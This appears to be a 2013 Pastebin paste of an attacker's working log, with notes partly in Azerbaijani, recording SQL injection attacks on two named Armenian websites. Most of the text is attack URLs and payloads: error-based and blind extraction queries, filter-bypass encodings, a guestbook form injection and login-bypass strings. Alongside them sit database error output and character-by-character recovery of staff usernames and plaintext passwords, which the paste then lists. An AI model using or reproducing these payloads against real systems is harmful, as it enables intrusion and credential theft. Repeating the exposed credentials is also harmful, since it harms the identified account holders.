API tools faq
paste
Advertisement
Guest User

11111111111111111111111111eseef

a guest
Mar 27th, 2013
412
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.26 KB | None | 0 0
raw download clone embed print report
  1. http://itpark.am/firm.php?lang=us&id=sleep%281%29
  2.  
  3.  
  4.  
  5.  
  6.  
  7.  
  8. http://itpark.am/firm.php?lang=us&id=-1%20or%206%20not%20in%20%28%279999999999%27%29
  9.  
  10.  
  11.  
  12. http://itpark.am/firm.php?lang=us&id=-9%20or%20@@version_compile_os%20NOT%20in%20%28%27win32%27%29
  13.  
  14.  
  15.  
  16.  
  17. http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%273%27%29%20And%20%27aAaAaA%27!=%27A%27
  18.  
  19.  
  20.  
  21.  
  22. (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))--
  23.  
  24.  
  25.  
  26. %01 bypass edir
  27.  
  28. http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%28select%20table_name%29%29%20AND%208-1=7
  29.  
  30.  
  31. bypass: http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%28select%201%0D%0A%0D%0A%0D%01FROM%0D%0A%0D%0A%0D%0A1%29%29%29%20AND%208-1=7
  32.  
  33.  
  34.  
  35.  
  36.  
  37. BYPASS FROM:
  38.  
  39. http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28%28select%20NULL,%0D%0D%0D%0D%0D%0dNULL,%0d%0a%20%20%27%TRUE%27%20from%0Ddual%29%29%20AND%208-1=7
  40.  
  41. SELECT firms.title_us AS title, firms.address_us AS address, firms.content_us AS description, firms.phone, firms.phone2, firms.fax, firms.email, firms.URL, GROUP_CONCAT(floors.building_code, floors.floor, '', room ORDER BY floors.building_code, floors.floor, CAST(room AS UNSIGNED) SEPARATOR ', №') AS rooms_list, SUM(rooms.area) as total_area FROM firms INNER JOIN rooms ON rooms.firm_id=firms.id INNER JOIN floors ON floors.id = rooms.floor_id WHERE firms.id=-1 or @@version_compile_os NOT in ((select NULL, NULL, '%TRUE' from dual)) AND 8-1=7 GROUP BY firms.id:Operand should contain 1 column(s)
  42.  
  43.  
  44.  
  45. firms
  46. rooms
  47. news
  48. services
  49. rent
  50. staff
  51.  
  52.  
  53.  
  54. //TRUE
  55.  
  56. http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28select%0D%0A%0D%20%60user_name%60%20%0D%20from%0D%60staff%60%29
  57.  
  58.  
  59.  
  60.  
  61. http://itpark.am/firm.php?lang=us&id=-1%20or%20@@version_compile_os%20NOT%20in%20%28select%0D%0A%0D%20%60user_name%60%20%0D%20from%0D%60staff%60%29
  62.  
  63.  
  64.  
  65. error based: http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20%60user_name%60%20%0D%20from%0D%60staff%60%29
  66.  
  67.  
  68.  
  69. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20group_concat%28%60user_name%60%29%20%0D%20from%0D%60staff%60%29
  70.  
  71.  
  72.  
  73. column: password:
  74.  
  75. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20group_concat%28%60password%60%29%20%0D%20from%0D%60staff%60%29
  76.  
  77.  
  78.  
  79. http://itpark.am/firm.php?lang=us&id=-1%20AnD%20%20%28select%0D%0A%0D%20miD%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29!=%271%27
  80.  
  81.  
  82. bypassed!!!
  83.  
  84. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20miD%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29!=%271%27
  85.  
  86. 3 user var:
  87.  
  88. //TRUE
  89.  
  90. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29!=%27%27
  91.  
  92.  
  93.  
  94. 3 got bala var burda: http://itpark.am/index.php?lang=us&go=staff
  95.  
  96.  
  97.  
  98. 3-cu userin parolunun
  99. ------------------------------------------------------
  100. 1ci simvolu:
  101.  
  102. v
  103.  
  104. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
  105.  
  106. ------------------------------------------------------
  107.  
  108. 2-ci simvolu: a
  109.  
  110. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
  111.  
  112. ------------------------------------------------------
  113. 3-cu simvolu: r
  114.  
  115. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
  116. ------------------------------------------------------
  117.  
  118. 4-cu simvolu: d
  119.  
  120. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
  121.  
  122. ------------------------------------------------------
  123.  
  124. 5-ci simvolu: a
  125.  
  126. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
  127.  
  128. ------------------------------------------------------
  129. 6-ci simvol: n
  130.  
  131. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
  132. ------------------------------------------------------
  133.  
  134. 7-ci simvol: v
  135.  
  136. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
  137.  
  138.  
  139. --------------------------------------------------------
  140.  
  141. 8-ci simvol: a
  142.  
  143. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,8,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
  144.  
  145. --------------------------------------------------------
  146.  
  147. anasini sikdiyim deyesen vardanvardan tipli pass istifade edir.
  148.  
  149. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
  150.  
  151.  
  152. 9-cu simvol: r
  153.  
  154. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
  155. --------------------------------------------------------
  156. 10-cu simvol: d
  157.  
  158. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
  159.  
  160. --------------------------------------------------------
  161.  
  162. 11-ci simvol: a
  163.  
  164. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
  165.  
  166. --------------------------------------------------------
  167.  
  168. 12-ci simvol: n
  169.  
  170. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,12,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
  171.  
  172. --------------------------------------------------------
  173.  
  174. //TRUE
  175.  
  176. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,13,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27%27
  177.  
  178.  
  179. vardanvardan
  180.  
  181.  
  182. //TRUE
  183.  
  184. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=0x76617264616E76617264616E
  185.  
  186.  
  187.  
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  194.  
  195.  
  196.  
  197. --------------------------------------------------------
  198. vardan gotbalanin *deqiq* user name -ini cekek:
  199. --------------------------------------------------------
  200. 1-ci simvol: v
  201.  
  202. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
  203.  
  204. --------------------------------------------------------
  205. 2: a
  206.  
  207. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
  208.  
  209. --------------------------------------------------------
  210. 3: r
  211.  
  212. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
  213.  
  214. --------------------------------------------------------
  215. 4: d
  216.  
  217. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
  218. --------------------------------------------------------
  219.  
  220. 5: a
  221.  
  222. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
  223. --------------------------------------------------------
  224. 6: n
  225.  
  226. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
  227.  
  228. --------------------------------------------------------
  229.  
  230. 7-ci simvol: v
  231.  
  232. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27v%27
  233.  
  234. --------------------------------------------------------
  235. 8: a
  236. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,8,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
  237.  
  238. --------------------------------------------------------
  239.  
  240. 9: r
  241.  
  242. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27r%27
  243. --------------------------------------------------------
  244.  
  245. 10: d
  246.  
  247. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27d%27
  248. --------------------------------------------------------
  249.  
  250. 11: a
  251.  
  252. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27a%27
  253. --------------------------------------------------------
  254.  
  255. 12: n
  256.  
  257.  
  258. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,12,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27n%27
  259.  
  260.  
  261.  
  262.  
  263.  
  264.  
  265.  
  266.  
  267.  
  268.  
  269. //true
  270.  
  271. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%202%29=%27vardanvardan%27
  272.  
  273. login: vardanvardan
  274. pass: vardanvardan
  275. login olmur! disabled account?
  276. =====================================================================
  277.  
  278. =====================================================================
  279. offset 0 daki userin loginini cekek:
  280. 1: g
  281.  
  282. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27g%27
  283.  
  284. =====================================================================
  285. 2: k
  286. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27k%27
  287.  
  288. =====================================================================
  289. 3: a
  290.  
  291. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
  292. =====================================================================
  293.  
  294. 4: r
  295.  
  296. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27r%27
  297. =====================================================================
  298. 5: a
  299.  
  300. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
  301.  
  302. =====================================================================
  303.  
  304. 6: p
  305.  
  306. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27p%27
  307. =====================================================================
  308.  
  309. 7: e
  310.  
  311. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27e%27
  312.  
  313. =====================================================================
  314.  
  315. 8: t
  316.  
  317. =====================================================================
  318. 9: y
  319.  
  320. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27y%27
  321.  
  322. =====================================================================
  323.  
  324.  
  325. 10: a
  326.  
  327. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
  328.  
  329. =====================================================================
  330.  
  331. 11: n
  332.  
  333. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27n%27
  334.  
  335. =====================================================================
  336. 12: bosdur
  337. //TRUE
  338. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,12,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27%27
  339.  
  340.  
  341.  
  342. //TRUE
  343.  
  344. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27gkarapetyan%27
  345.  
  346. offset 0
  347.  
  348. gkarapetyan
  349.  
  350. passi cekek:
  351.  
  352.  
  353.  
  354. ============================
  355.  
  356. 1: k
  357.  
  358. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27k%27
  359. ============================
  360.  
  361. 2: a
  362.  
  363. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,2,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
  364.  
  365. ============================
  366.  
  367. 3: r
  368.  
  369. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,3,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27r%27
  370.  
  371. ============================
  372. 4: a
  373.  
  374. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,4,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
  375.  
  376. ============================
  377.  
  378. 5: p
  379.  
  380. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,5,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27p%27
  381.  
  382. ============================
  383.  
  384. 6: e
  385.  
  386. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,6,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27e%27
  387.  
  388. ============================
  389.  
  390. 7: t
  391.  
  392. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,7,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27t%27
  393.  
  394. ============================
  395.  
  396. 8: y
  397.  
  398. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,8,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27y%27
  399.  
  400. ============================
  401.  
  402. 9: a
  403.  
  404. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,9,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27a%27
  405.  
  406. ============================
  407.  
  408. 10: n
  409.  
  410. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,10,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27n%27
  411.  
  412. ============================
  413. //TRUE
  414. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,11,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=%27%27
  415.  
  416.  
  417.  
  418.  
  419. //TRUE
  420. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60user_name%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=0x676B61726170657479616E
  421.  
  422. hex('gkarapetyan') |
  423. -----------------------+
  424. 676B61726170657479616E |
  425. -----------------------+
  426. row in set (0.00 sec)
  427.  
  428.  
  429.  
  430.  
  431.  
  432. //TRUE
  433.  
  434. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,33%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%200%29=0x6B61726170657479616E
  435.  
  436. hex('karapetyan') |
  437. ----------------------+
  438. 6B61726170657479616E |
  439. ----------------------+
  440.  
  441.  
  442. gkarapetyan
  443. karapetyan
  444.  
  445.  
  446.  
  447.  
  448. offset 1
  449.  
  450. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,1%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%201%29=%27s%27
  451.  
  452.  
  453.  
  454.  
  455. pass: sergeysergey
  456.  
  457. //TRUE
  458.  
  459. http://itpark.am/firm.php?lang=us&id=-1%20or%20%20%28select%0D%0A%0D%20mid%28%60password%60,1,20%29%20%0D%20from%0D%60staff%60%20limit%201%20offset%201%29=%27sergeysergey%27
  460.  
  461.  
  462.  
  463.  
  464.  
  465.  
  466. or (select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1
  467.  
  468. http://www.armenian-guides.am/index.php?lang=us&go=guestbook
  469.  
  470.  
  471. 1' and 1 not like 'aaaaaaaaaaaa
  472.  
  473.  
  474. insert into guestbook (comment, URL) values ('\', 'xxxxxxxxxxxxx'):You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '84.32.10.231')' at line 1
  475.  
  476. ',version())-- AND 3!=('3
  477.  
  478.  
  479. ',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3
  480.  
  481. (select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  482.  
  483.  
  484.  
  485.  
  486.  
  487. GUESTBOOK
  488. insert into guestbook (comment, URL) values ('',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.tables where table_schema=database() limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3', '84.32.10.231'):
  489. Duplicate entry 'about|5.0.901' for key 1
  490.  
  491.  
  492.  
  493.  
  494. limit 2,1
  495. '84.32.10.231'):Duplicate entry 'armenia|5.0.901' for key 1
  496.  
  497.  
  498.  
  499. 'be_member|5.0.901' fo
  500.  
  501. become
  502.  
  503. beforehand
  504.  
  505.  
  506. bylaws
  507.  
  508.  
  509. code
  510.  
  511. contacts
  512.  
  513. guestbook
  514. languages
  515.  
  516. library
  517.  
  518. links
  519. literature
  520.  
  521. member_only
  522. news
  523. persons
  524. survey1
  525. trainings
  526. websites
  527. words
  528.  
  529.  
  530.  
  531. insert into guestbook (comment, URL) values ('',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.columns where table_schema=database() and column_name='password' limit 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3', '84.32.10.231'):Duplicate entry 'persons|5.0.901' for key 1
  532.  
  533.  
  534.  
  535.  
  536.  
  537.  
  538.  
  539.  
  540.  
  541. -----------------------------3691302952036\r\n
  542. Content-Disposition: form-data; name="go"\r\n
  543. \r\n
  544. guestbook\r\n
  545. -----------------------------3691302952036\r\n
  546. Content-Disposition: form-data; name="sub"\r\n
  547. \r\n
  548. \r\n
  549. -----------------------------3691302952036\r\n
  550. Content-Disposition: form-data; name="act"\r\n
  551. \r\n
  552. save\r\n
  553. -----------------------------3691302952036\r\n
  554. Content-Disposition: form-data; name="lang"\r\n
  555. \r\n
  556. us\r\n
  557. -----------------------------3691302952036\r\n
  558. Content-Disposition: form-data; name="username"\r\n
  559. \r\n
  560. \r\n
  561. -----------------------------3691302952036\r\n
  562. Content-Disposition: form-data; name="password"\r\n
  563. \r\n
  564. \r\n
  565. -----------------------------3691302952036\r\n
  566. Content-Disposition: form-data; name="comment"\r\n
  567. \r\n
  568. ',(select floor(rand(0)*2) from(select count(*),concat((select concat(table_name,0x7c,version()) from information_schema.columns where table_schema=database() and column_name='username' limit 1 offset 0),floor(rand(0)*2))x from information_schema.tables group by x)a))-- AND 3!=('3\r\n
  569. -----------------------------3691302952036--\r\n
  570.  
  571.  
  572.  
  573.  
  574.  
  575. persons table-inda columnlar:
  576.  
  577. entry 'PersonID|agg@localhost1' for key 1
  578. FirstName_am
  579. FirstName_ru
  580. FirstName_us
  581. FirstName_de
  582. FirstName_fr
  583. Password
  584. UserName
  585.  
  586.  
  587. MEMBER ONLY ACCESS
  588. select * from persons where UserName='\' and Password='':You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' and Password=''' at line 1
  589.  
  590.  
  591.  
  592. select * from persons where UserName=''' and Password=''
  593.  
  594. login:\
  595. pass: or username=(select username from persons limit 1) and password=(select password from persons limit 1)-- and 3='3
  596.  
  597. bypass:
  598. login: ' or 5=5-- and 3='3
  599.  
  600. pass: \
  601.  
  602.  
  603.  
  604.  
  605.  
  606.  
  607.  
  608. ' or username=(select username from persons limit 1 offset 1)-- and 3='3-- and 3='3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!